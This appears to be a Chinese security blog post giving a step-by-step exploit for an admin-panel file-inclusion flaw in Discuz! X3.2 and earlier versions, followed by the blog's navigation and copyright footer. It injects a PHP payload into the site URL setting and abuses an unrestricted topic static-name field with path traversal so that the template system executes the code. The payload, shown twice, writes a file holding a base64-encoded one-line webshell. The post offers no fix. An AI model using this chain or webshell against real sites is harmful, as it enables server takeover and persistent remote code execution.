最新版本:Discuz! X3.2 Release 20140618

包括以前版本

 

 

由于创建专题时未对

静态化名称

做任何限制引发此漏洞

1.全局->站点信息

网站 URL: http://www.comsenz.com/#<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?>

Discuz3.2后台文件包含漏洞可后台拿shell – 网站安全插图

2.工具->更新缓存Discuz3.2后台文件包含漏洞可后台拿shell – 网站安全插图1

 

3.门户->HTML管理

静态文件扩展名: htm

专题HTML存放目录:data/cacheDiscuz3.2后台文件包含漏洞可后台拿shell – 网站安全插图24.创建专题

静态化名称[此处未做任何限制]:../../template/default/portal/portal_topic_test

 

5.专题管理

对刚添加的专题 开启 并生成

6.再次创建专题

模板名 选择刚生成的 ./template/default/portal/portal_topic_test.htm

提交

Discuz3.2后台文件包含漏洞可后台拿shell – 网站安全插图3

 

就执行了php代码 <?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?>

不仅仅是可以生成到专题目录,可以生成到任何可以包含的下面!

 

    上一篇: Access数据库基于时间盲注的实现 - 网站安全 - 自

    下一篇: 逐浪CMS某处编码SQL注入漏洞 - 网站安全 - 自学p
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《Discuz3.2后台文件包含漏洞可后台拿shell – 网站安全
   

还没有人抢沙发呢~